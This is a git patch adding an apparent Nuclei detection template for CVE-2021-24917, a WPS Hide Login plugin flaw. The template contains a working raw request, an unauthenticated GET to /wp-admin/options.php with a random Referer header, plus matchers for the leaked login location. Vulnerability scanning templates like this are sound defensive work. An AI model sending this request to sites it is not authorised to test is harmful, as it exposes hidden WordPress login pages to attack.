From 3cf12a28c9a885f8004a3976d9d69352e114e631 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Sep 2022 01:15:11 +0530 Subject: [PATCH] Create CVE-2021-24917.yaml --- cves/2021/CVE-2021-24917.yaml | 37 +++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2021/CVE-2021-24917.yaml diff --git a/cves/2021/CVE-2021-24917.yaml b/cves/2021/CVE-2021-24917.yaml new file mode 100644 index 0000000000..bc23368b42 --- /dev/null +++ b/cves/2021/CVE-2021-24917.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-24917 + +info: + name: WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header + author: akincibor + severity: low + description: The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. + remediation: Fixed in version 1.9.1 + reference: + - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24917 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24917 + metadata: + verified: true + tags: cve,cve2021,wp,wordpress,wp-plugin,unauth + +requests: + - raw: + - | + GET /wp-admin/options.php HTTP/1.1 + Host: {{Hostname}} + Referer: something + + extractors: + - type: kval + kval: + - location + + matchers-condition: and + matchers: + - type: word + part: location + words: + - 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1' + - type: dsl + dsl: + - "!contains(tolower(location), 'wp-login.php')"